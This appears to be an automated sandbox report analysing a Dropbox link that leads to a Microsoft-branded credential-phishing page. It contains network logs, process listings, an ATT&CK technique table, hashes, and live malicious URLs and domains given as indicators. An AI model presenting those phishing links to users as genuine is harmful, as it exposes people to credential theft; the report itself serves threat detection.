Source: unknownNetwork traffic detected: HTTP traffic on port 62234 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62641 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 62729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 62757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 62669 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62383 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62613 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62700
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62702
Source: unknownNetwork traffic detected: HTTP traffic on port 62768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 62598 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62609 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62576 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62552
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62554
Source: unknownNetwork traffic detected: HTTP traffic on port 62610 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62564 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62690
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62506 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62560
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62561
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62562
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62563
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62322
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62564
Source: unknownNetwork traffic detected: HTTP traffic on port 62724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62565
Source: unknownNetwork traffic detected: HTTP traffic on port 62615 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62566
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62567
Source: unknownNetwork traffic detected: HTTP traffic on port 62758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62580
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62337
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62579
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62450
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62453
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62574
Source: unknownNetwork traffic detected: HTTP traffic on port 62702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62575
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62576
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62697
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62577
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62578
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 62583 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62577 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62450 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62535 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62552 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62583
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62584
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62585
Source: unknownNetwork traffic detected: HTTP traffic on port 62594 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62759
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62751
Source: unknownNetwork traffic detected: HTTP traffic on port 62761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62754
Source: unknownNetwork traffic detected: HTTP traffic on port 62247 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62761
Source: unknownNetwork traffic detected: HTTP traffic on port 62766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62641
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62642
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62763
Source: unknownNetwork traffic detected: HTTP traffic on port 62611 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62644
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62765
Source: unknownNetwork traffic detected: HTTP traffic on port 62292 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62584 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62535
Source: unknownNetwork traffic detected: HTTP traffic on port 62578 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62538
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62772
Source: unknownNetwork traffic detected: HTTP traffic on port 62616 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62533
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62562 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62644 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62669
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62542
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62760 -> 443
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.18:49833 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.18:62247 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.75:443 -> 192.168.2.18:62292 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.178:443 -> 192.168.2.18:62383 version: TLS 1.2
Source: classification engineClassification label: mal60.phis.win@18/327@64/220
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.dropbox.com/scl/fo/dypnewy032frqiop6d7gh/AGQRgoJcNqKPbhsYQheP8nM?rlkey=t6ozmhhbporfamqnz8ddx2in0&st=r8w1wv0v&dl=0
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1952,i,11583982541712722701,1603866110619100737,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1952,i,11583982541712722701,1603866110619100737,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
3
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.dropbox.com/scl/fo/dypnewy032frqiop6d7gh/AGQRgoJcNqKPbhsYQheP8nM?rlkey=t6ozmhhbporfamqnz8ddx2in0&st=r8w1wv0v&dl=00%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0016.t-0009.t-msedge.net
13.107.246.44
truefalse
    unknown
    use1-turn.fpjs.io
    18.196.235.131
    truefalse
      unknown
      google.com
      142.250.185.238
      truefalse
        unknown
        bolt.v.dropbox.com
        162.125.21.3
        truefalse
          unknown
          cmowunfermlndorminantckrewzoo.lol
          137.184.176.204
          truetrue
            unknown
            static-iad.v.dropbox.com
            162.125.21.1
            truefalse
              unknown
              edge-block-previews-env.dropbox-dns.com
              162.125.66.16
              truefalse
                unknown
                code.jquery.com
                151.101.2.137
                truefalse
                  unknown
                  cdnjs.cloudflare.com
                  104.17.25.14
                  truefalse
                    unknown
                    static-pdx.v.dropbox.com
                    162.125.40.3
                    truefalse
                      unknown
                      www-env.dropbox-dns.com
                      162.125.66.18
                      truefalse
                        unknown
                        www.google.com
                        142.250.184.196
                        truefalse
                          unknown
                          pub-03a94b366f924d73997765875d0e6b81.r2.dev
                          104.18.3.35
                          truetrue
                            unknown
                            s-part-0032.t-0009.t-msedge.net
                            13.107.246.60
                            truefalse
                              unknown
                              fp.dropbox.com
                              3.160.150.129
                              truefalse
                                unknown
                                uc5a1b9bcddbfdcf24f27aa76912.previews.dropboxusercontent.com
                                unknown
                                unknownfalse
                                  unknown
                                  cfl.dropboxstatic.com
                                  unknown
                                  unknownfalse
                                    unknown
                                    www.dropboxstatic.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      beacon.dropbox.com
                                      unknown
                                      unknownfalse
                                        unknown
                                        www.dropbox.com
                                        unknown
                                        unknownfalse
                                          unknown
                                          uce3be385a7bf3e7836869b0a870.previews.dropboxusercontent.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            NameMaliciousAntivirus DetectionReputation
                                            https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.htmltrue
                                              unknown
                                              https://www.dropbox.com/scl/fo/dypnewy032frqiop6d7gh/AGQRgoJcNqKPbhsYQheP8nM?rlkey=t6ozmhhbporfamqnz8ddx2in0&e=1&st=r8w1wv0v&dl=0false
                                                unknown
                                                https://www.dropbox.com/scl/fo/dypnewy032frqiop6d7gh/AGQRgoJcNqKPbhsYQheP8nM?dl=0&e=1&preview=Work+Order+%26+Pay+App.pdf&rlkey=t6ozmhhbporfamqnz8ddx2in0&st=r8w1wv0vfalse
                                                  unknown
                                                  https://www.dropbox.com/scl/fo/dypnewy032frqiop6d7gh/AGQRgoJcNqKPbhsYQheP8nM?rlkey=t6ozmhhbporfamqnz8ddx2in0&st=r8w1wv0v&dl=0false
                                                    unknown
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    142.250.185.206
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    18.196.235.131
                                                    use1-turn.fpjs.ioUnited States
                                                    16509AMAZON-02USfalse
                                                    104.18.3.35
                                                    pub-03a94b366f924d73997765875d0e6b81.r2.devUnited States
                                                    13335CLOUDFLARENETUStrue
                                                    3.160.150.90
                                                    unknownUnited States
                                                    16509AMAZON-02USfalse
                                                    13.107.246.44
                                                    s-part-0016.t-0009.t-msedge.netUnited States
                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    173.194.76.84
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    3.160.150.129
                                                    fp.dropbox.comUnited States
                                                    16509AMAZON-02USfalse
                                                    13.107.246.60
                                                    s-part-0032.t-0009.t-msedge.netUnited States
                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                    151.101.130.137
                                                    unknownUnited States
                                                    54113FASTLYUSfalse
                                                    137.184.176.204
                                                    cmowunfermlndorminantckrewzoo.lolUnited States
                                                    11003PANDGUStrue
                                                    162.125.40.3
                                                    static-pdx.v.dropbox.comUnited States
                                                    19679DROPBOXUSfalse
                                                    162.125.21.1
                                                    static-iad.v.dropbox.comUnited States
                                                    19679DROPBOXUSfalse
                                                    104.16.99.29
                                                    unknownUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    162.125.21.3
                                                    bolt.v.dropbox.comUnited States
                                                    19679DROPBOXUSfalse
                                                    66.102.1.84
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    142.250.184.195
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    142.250.184.196
                                                    www.google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    162.125.66.16
                                                    edge-block-previews-env.dropbox-dns.comUnited States
                                                    19679DROPBOXUSfalse
                                                    1.1.1.1
                                                    unknownAustralia
                                                    13335CLOUDFLARENETUSfalse
                                                    162.125.66.18
                                                    www-env.dropbox-dns.comUnited States
                                                    19679DROPBOXUSfalse
                                                    74.125.133.84
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    142.250.185.238
                                                    google.comUnited States
                                                    15169GOOGLEUSfalse
                                                    151.101.2.137
                                                    code.jquery.comUnited States
                                                    54113FASTLYUSfalse
                                                    64.233.167.84
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    239.255.255.250
                                                    unknownReserved
                                                    unknownunknownfalse
                                                    142.250.185.131
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    142.250.184.238
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    104.17.25.14
                                                    cdnjs.cloudflare.comUnited States
                                                    13335CLOUDFLARENETUSfalse
                                                    172.217.18.100
                                                    unknownUnited States
                                                    15169GOOGLEUSfalse
                                                    IP
                                                    192.168.2.18
                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                    Analysis ID:1510150
                                                    Start date and time:2024-09-12 16:16:12 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                    Sample URL:https://www.dropbox.com/scl/fo/dypnewy032frqiop6d7gh/AGQRgoJcNqKPbhsYQheP8nM?rlkey=t6ozmhhbporfamqnz8ddx2in0&st=r8w1wv0v&dl=0
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:13
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • EGA enabled
                                                    Analysis Mode:stream
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal60.phis.win@18/327@64/220
                                                    • Exclude process from analysis (whitelisted): svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 152.199.19.161, 142.250.184.195, 142.250.185.206, 173.194.76.84, 34.104.35.123, 104.16.99.29, 104.16.100.29
                                                    • Excluded domains from analysis (whitelisted): cdp-f-tlu-net.trafficmanager.net, wildcardtlu.azureedge.net, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, msedge.b.tlu.dl.delivery.mp.microsoft.com, clientservices.googleapis.com, clients.l.google.com, cfl.dropboxstatic.com.cdn.cloudflare.net, wildcardtlu.ec.azureedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, cs9.wpc.v0cdn.net
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • VT rate limit hit for: https://www.dropbox.com/scl/fo/dypnewy032frqiop6d7gh/AGQRgoJcNqKPbhsYQheP8nM?rlkey=t6ozmhhbporfamqnz8ddx2in0&st=r8w1wv0v&dl=0
                                                    InputOutput
                                                    URL: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.html Model: jbxai
                                                    {
                                                    "brand":["Microsoft"],
                                                    "contains_trigger_text":true,
                                                    "prominent_button_name":"Next",
                                                    "text_input_field_labels":["Email,
                                                     phone,
                                                     or Skype",
                                                    "Can't access your account?"],
                                                    "pdf_icon_visible":false,
                                                    "has_visible_captcha":false,
                                                    "has_urgent_text":false,
                                                    "has_visible_qrcode":false}
                                                    URL: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.html Model: jbxai
                                                    {
                                                    "phishing_score":0,
                                                    "brands":["Microsoft"],
                                                    "brand_matches_associated_domain":false,
                                                    "reasons":"The domain 'pub-03a94b366f924d73997765875d0e6b81.r2.dev' does not match the legitimate domain associated with Microsoft,
                                                     which is'microsoft.com'. The presence of the 'dev' top level domain and the 'pub' subdomain suggests that this is a development environment,
                                                     possibly for testing or internal use,
                                                     rather than a legitimate Microsoft webpage.",
                                                    "brand_matches":[false],
                                                    "url_match":false}
                                                    URL: https://pub-03a94b366f924d73997765875d0e6b81.r2.dev/statementonedrivedoc.html Model: jbxai
                                                    {
                                                    "brand":["Microsoft"],
                                                    "contains_trigger_text":false,
                                                    "prominent_button_name":"Next",
                                                    "text_input_field_labels":["unknown"],
                                                    "pdf_icon_visible":false,
                                                    "has_visible_captcha":false,
                                                    "has_urgent_text":false,
                                                    "has_visible_qrcode":false}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 12 13:16:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2675
                                                    Entropy (8bit):3.9702103109988087
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:58F67083BF1D02BBB8EB777597A56F95
                                                    SHA1:0B8A1CC9FF92A730C5A715BD43710299FFF95F36
                                                    SHA-256:642258D965754D736F0B29AF2CFDBBC3114ACFA0FE10D2B0BD9673053B61550F
                                                    SHA-512:F8E0E7B8024E1A090F263E588A832989D5046FD6F3AC094E0E19C505647F89397EA54E12248B86ABCADBCFE7B2D501D4039E5618ACC1D64266B2B98555244805
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,.......e........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I,Y.r....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V,Y.r....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V,Y.r....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V,Y.r...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V,Y.r.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............u.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 12 13:16:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2677
                                                    Entropy (8bit):3.9914977789059005
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6513121578BC5D22928CDA50BA4E7689
                                                    SHA1:6F69C2EB21C474C79683A3E5E2D7E5A1D2F58511
                                                    SHA-256:A26C557ADD732626B760904975FF5131D061B7E458419D1480EF36850791177D
                                                    SHA-512:61286FC8E97DBDF6664B845356E26676F7D94507190A3C79D617DFE2B7CB3AD4D97A0F18261C1B53CF93D5BD47A2EBB41A1BF8E5B247F321E61A8F58D3AD013E
                                                    Malicious:false
                                                    Reputation:unknown
